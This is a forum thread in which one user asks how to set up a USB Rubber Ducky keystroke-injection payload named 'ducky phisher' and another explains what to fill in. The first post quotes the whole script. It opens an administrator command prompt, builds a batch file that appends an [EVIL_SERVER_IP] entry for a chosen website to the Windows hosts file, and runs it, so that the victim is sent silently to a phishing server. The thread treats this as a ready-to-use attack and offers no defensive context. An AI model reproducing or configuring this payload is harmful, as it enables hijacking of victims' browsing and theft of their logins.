xstormx Posted September 10, 2013 Share Posted September 10, 2013 Hey guys, Do I replace the Green statements with the evil server IP and web address with or without the brackets and quotes? Secondly can someone decipher what this means "you need to add the www. version and with out it as well." in the 5th REM line? Thanks in advance guys https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---ducky-phisher REM Author: .:Koryusai-Kun:. REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windowsREM Description: so when the user types into there web browser for example www.facebook.com itREM Description: insted of going to the proper ip it gose to the one in the host file your evil one.REM Description: you need to add the www. version and with out it as well.REM ---[start CMD as administrator]-----------------------GUIDELAY 50STRING cmdDELAY 150MENUDELAY 75STRING aEnterDELAY 200LEFTENTERSTRING clsENTERREM ---[END]----------------------------------------------DELAY 300REM ---[inject into the host file]------------------------STRING copy con inject.batENTERSTRING SET NEWLINE=^& echo.ENTERENTERSTRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hostsENTERSTRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hostsENTERENTERSTRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hostsENTERSTRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hostsENTERCONTROL zENTERSTRING inject.batENTERREM ---[END]----------------------------------------------DELAY 200STRING exitENTER Quote Link to comment Share on other sites More sharing options...
no42 Posted September 14, 2013 Share Posted September 14, 2013 just replace the green words and [ ], leave the "" in place Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.